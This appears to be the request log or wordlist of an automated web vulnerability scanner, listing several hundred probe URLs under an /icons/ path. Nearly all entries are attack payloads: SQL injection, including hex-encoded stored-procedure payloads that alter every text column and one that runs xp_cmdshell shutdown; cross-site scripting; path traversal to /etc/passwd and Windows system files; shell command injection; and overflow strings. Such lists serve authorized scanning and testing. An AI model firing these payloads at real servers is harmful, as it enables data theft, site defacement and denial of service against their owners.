/icons/%2E/?C=N;O=D';%20select%20*%20from%20sys.dba_users--
/icons/%2E/?C=N;O=D';%20select%20@@version,1,1,1--
/icons/%2E/?C=N;O=D)%20having%201=1--
/icons/%2E/?C=N;O=D*/--></script><script>alert(xss)</script>
/icons/%2E/?C=N;O=D+alert(xss)+
/icons/%2E/?C=N;O=D1%20having%201=1--
/icons/%2E/?C=N;O=DWFXSSProbe
/icons/%2E/?C=N;O=D\'%20having%201=1--
/icons/%2E/?C=S;O=A
/icons/%2E/?C=somechars'%20+%20'N;O=D
/icons/%2E/?C=somechars'%20||%20'N;O=D
/icons/%2E/?C=WF'SQL"Probe;A--B
/icons/%2E/?C=\"
/icons/%2E/?C=\'
/icons/%2E/?C=\..\..\..\..\..\..\..\..\boot.ini
/icons/%2E/?C=\..\..\..\..\..\..\..\..\windows\win.ini
/icons/%2E/?C=\..\..\..\..\..\..\..\..\winnt\win.ini
/icons/%2E/?C=\u003Cscript\u003Ealert\u002848517\u0029\u003C/script\u003E
/icons/%2E/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini
/icons/%2E/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/icons/%2E/?C=\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/icons/%2E/?M=A
/icons/%2E/?S=D
/icons/%2E/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/%2E/admin.asp
/icons/%2E/admin.aspx
/icons/%2E/admin.cfg
/icons/%2E/admin.cfm
/icons/%2E/admin.cgi
/icons/%2E/admin.conf
/icons/%2E/admin.dat
/icons/%2E/admin.data
/icons/%2E/admin.htm
/icons/%2E/admin.html
/icons/%2E/admin.ini
/icons/%2E/admin.php
/icons/%2E/admin.php3
/icons/%2E/admin.pl
/icons/%2E/admin.pw
/icons/%2E/admin.shtml
/icons/%2E/admin.txt
/icons/%2E/admin.udl
/icons/%2E/adSamples/config/site.csc
/icons/%2E/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:")|
/icons/%2E/cgi-bin/htimage.exe?2,2
/icons/%2E/connect.asp?server=%3Cscript%3Ealert%2841351%29%3C%2Fscript%3E
/icons/%2E/Copy%20of%20README
/icons/%2E/CVS/
/icons/%2E/EDM-ViewController-context-root/browse.do?act=%3CSCRIPT%3Ealert(xss);%3C/SCRIPT%3E&amp;select=1177281
/icons/%2E/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert(xss)%3c%2fscript%3e
/icons/%2E/examples/SendMailServlet
/icons/%2E/examples/servlet/SnoopServlet
/icons/%2E/examples/servlet/TroubleShooter
/icons/%2E/exchange/forms/ipm/note/cmpTitle.asp?tab=%22%2Balert%2841193%29%3B%7D%20setImportance%281%29%3B%3C%2Fscript%3E&att=0&imp=1
/icons/%2E/global.asa+.htr
/icons/%2E/global.asax+.htr
/icons/%2E/global.asax\
/icons/%2E/global.asa\
/icons/%2E/globals.jsa
/icons/%2E/iissamples/exair/howitworks/codebrws.asp?source=/msadc/../../../../../boot.ini
/icons/%2E/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/iissamples/sdk/asp/docs/%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./winnt/win.ini%c0%80.asp
/icons/%2E/iissamples/sdk/asp/interaction/ServerVariables_Jscript.asp
/icons/%2E/msadc/msadcs.dll
/icons/%2E/msadc/Samples/Selector/ShowCode.asp?source=/msadc/../../../../../boot.ini
/icons/%2E/nonExistentPage.asp
/icons/%2E/nonExistentPage.aspx
/icons/%2E/nonExistentPage.cfm
/icons/%2E/nonExistentPage.cgi
/icons/%2E/nonExistentPage.html
/icons/%2E/nonExistentPage.jhtml
/icons/%2E/nonExistentPage.jsp
/icons/%2E/nonExistentPage.msp
/icons/%2E/nonExistentPage.nsf
/icons/%2E/nonExistentPage.php
/icons/%2E/nonExistentPage.php3
/icons/%2E/nonExistentPage.php4
/icons/%2E/nonExistentPage.pl
/icons/%2E/nonExistentPage.shtml
/icons/%2E/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root=<script>alert(xss)</script>
/icons/%2E/NR/System/Access/ManualLogin.asp?REASONTXT=<script>alert(xss)</script>
/icons/%2E/null.htw?CiWebHitsFile=/default.htm&CiRestriction="<script>alert(xss)</script>"
/icons/%2E/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/icons/%2E/null.htw?CiWebHitsFile=/global.asax%20&CiRestriction=none&CiHiliteType=Full
/icons/%2E/null.htw?CiWebHitsFile=/index.htm&CiRestriction="<script>alert(xss)</script>"
/icons/%2E/null.htw?CiWebHitsFile=/index.html&CiRestriction="<script>alert(xss)</script>"
/icons/%2E/Old%20README
/icons/%2E/OldREADME
/icons/%2E/order.htm
/icons/%2E/order.html
/icons/%2E/order.txt
/icons/%2E/output-build.txt
/icons/%2E/owa_util.listprint?p_theQuery=SELECT%20*%20FROM%20SYS.TAB&p_cname=&p_nsize=
/icons/%2E/owa_util.signature
/icons/%2E/pbserver/pbserver.dll?&&&&&&pb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/%2E/phpmyadmin/sql.php3?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/%2E/phpmyadmin/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/%2E/RCS/
/icons/%2E/README
/icons/%2E/README%20
/icons/%2E/README%3F+.htr
/icons/%2E/README+.htr
/icons/%2E/README.$$$
/icons/%2E/README.-OLD
/icons/%2E/README.0
/icons/%2E/README.arc
/icons/%2E/README.bac
/icons/%2E/README.BACKUP
/icons/%2E/README.bak
/icons/%2E/README.cs
/icons/%2E/README.csproj
/icons/%2E/README.html
/icons/%2E/README.html.cs
/icons/%2E/README.html.vb
/icons/%2E/README.html/%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons/%2E/README.html/%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons/%2E/README.html/?>'"><script>alert(xss)</script>
/icons/%2E/README.html;.cfm
/icons/%2E/README.inc
/icons/%2E/README.lst
/icons/%2E/README.OLD
/icons/%2E/README.old2
/icons/%2E/README.orig
/icons/%2E/README.resx
/icons/%2E/README.sav
/icons/%2E/README.save
/icons/%2E/README.sln
/icons/%2E/README.temp
/icons/%2E/README.TMP
/icons/%2E/README.vb
/icons/%2E/README.vbproj
/icons/%2E/README.~1
/icons/%2E/README.~bk
/icons/%2E/README/%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons/%2E/README/%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons/%2E/README/?>'"><script>alert(xss)</script>
/icons/%2E/README1
/icons/%2E/README;.cfm
/icons/%2E/README?%3E%27%22%3E%3Cscript%3Ealert%2841735%29%3C%2Fscript%3E=123
/icons/%2E/README?%3E%27%22%3E%3Cscript%3Ealert%2841739%29%3C%2Fscript%3E=123
/icons/%2E/README?>'"><script>alert(xss)</script>
/icons/%2E/README?dbg=on
/icons/%2E/README?DEBUG=1
/icons/%2E/README?DEBUG=ON
/icons/%2E/README?Debug=T
/icons/%2E/README?Debug=true
/icons/%2E/README?Debug=yes
/icons/%2E/READMETA
/icons/%2E/README\
/icons/%2E/README~
/icons/%2E/README~1
/icons/%2E/README~bk
/icons/%2E/register.htm
/icons/%2E/register.html
/icons/%2E/register.txt
/icons/%2E/registration.htm
/icons/%2E/registration.html
/icons/%2E/registration.txt
/icons/%2E/registrations.htm
/icons/%2E/registrations.html
/icons/%2E/registrations.txt
/icons/%2E/robots.txt
/icons/%2E/scripts/iisadmin/bdir.htr
/icons/%2E/SELECT%09'aa'%09FROM%09TAB
/icons/%2E/servervariables_vbscript.asp
/icons/%2E/sitemap.gz
/icons/%2E/sitemap.xml
/icons/%2E/sitemap.xml.gz
/icons/%2E/small/
/icons/%2E/small/%00/
/icons/%2E/small/%2e%2e/%2e%2e/%00.jsp
/icons/%2E/small/%2E/
/icons/%2E/small/%2F/
/icons/%2E/small/%5C/
/icons/%2E/small//%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons/%2E/small//%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons/%2E/small//?>'"><script>alert(xss)</script>
/icons/%2E/small/123%0a%0a%3ealert(xss)%3b%3c/script%3e123.jsp
/icons/%2E/small/<oot.ini
/icons/%2E/small/>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/icons/%2E/small/?>'"><script>alert(xss)</script>
/icons/%2E/small/?C=
/icons/%2E/small/?C="
/icons/%2E/small/?C="'><A%20HREF="/WF_XSRF.html">Injected%20Link</A>
/icons/%2E/small/?C="'><IMG%20SRC="/WF_XSRF.html">
/icons/%2E/small/?C="></IFRAME><script>alert(xss)</script>
/icons/%2E/small/?C="></style><script>alert(xss)</script>
/icons/%2E/small/?C="></STYLE><STYLE>@import"javascriptt(xss)";</STYLE>
/icons/%2E/small/?C="></title><script>alert(xss)</script>
/icons/%2E/small/?C=%00
/icons/%2E/small/?C=%20onMouseOver=alert(xss)>
/icons/%2E/small/?C=%22%20%7C%20%22id
/icons/%2E/small/?C=%22%20%7C%20%22vol
/icons/%2E/small/?C=%22%20onMouseOver=alert(xss)>
/icons/%2E/small/?C=%22%20style%3D%22backgroundession(alert(xss))%22%20OA%3D%22
/icons/%2E/small/?C=%22%27
/icons/%2E/small/?C=%26%26id
/icons/%2E/small/?C=%26%26vol
/icons/%2E/small/?C=%27%20%7C%20%27id
/icons/%2E/small/?C=%27%20%7C%20%27vol
/icons/%2E/small/?C=%27%22%3E%3Cscript%3Ealert(xss)%3C%2Fscript%3E
/icons/%2E/small/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/%2E/small/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/%2E/small/?C=%7C%7Cid
/icons/%2E/small/?C=%7C%7Cvol
/icons/%2E/small/?C=%7Cid
/icons/%2E/small/?C=%7Cvol
/icons/%2E/small/?C=%A7%A2%BE%BC%F3%E3%F2%E9%F0%F4%BE%E1%EC%E5%F2%F4%A842075%A9%BC%AF%F3%E3%F2%E9%F0%F4%BE
/icons/%2E/small/?C='
/icons/%2E/small/?C='"><iframe%20src=javascriptt(xss)>
/icons/%2E/small/?C='%20+%20''%20+%20'N;O=D
/icons/%2E/small/?C='%20onMouseOver=alert(xss)>
/icons/%2E/small/?C='%20||%20'N;O=D
/icons/%2E/small/?C=)
/icons/%2E/small/?C=--><script>alert(xss)</script>
/icons/%2E/small/?C=../../../../../../bin/id|
/icons/%2E/small/?C=../../../../../../usr/bin/id|
/icons/%2E/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
/icons/%2E/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/icons/%2E/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/icons/%2E/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini
/icons/%2E/small/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/icons/%2E/small/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/icons/%2E/small/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/icons/%2E/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini
/icons/%2E/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/icons/%2E/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/icons/%2E/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini
/icons/%2E/small/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../boot.ini
/icons/%2E/small/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/icons/%2E/small/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/win.ini
/icons/%2E/small/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/icons/%2E/small/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini
/icons/%2E/small/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/icons/%2E/small/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../boot.ini
/icons/%2E/small/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/icons/%2E/small/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/win.ini
/icons/%2E/small/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../boot.ini
/icons/%2E/small/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/icons/%2E/small/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/win.ini
/icons/%2E/small/?C=/../../../../../../../../boot.ini
/icons/%2E/small/?C=/../../../../../../../../etc/passwd
/icons/%2E/small/?C=/../../../../../../../../windows/win.ini
/icons/%2E/small/?C=/../../../../../../../../winnt/win.ini
/icons/%2E/small/?C=;
/icons/%2E/small/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/%2E/small/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/%2E/small/?C=;vol|
/icons/%2E/small/?C=</TextArea><script>alert(xss)</script>
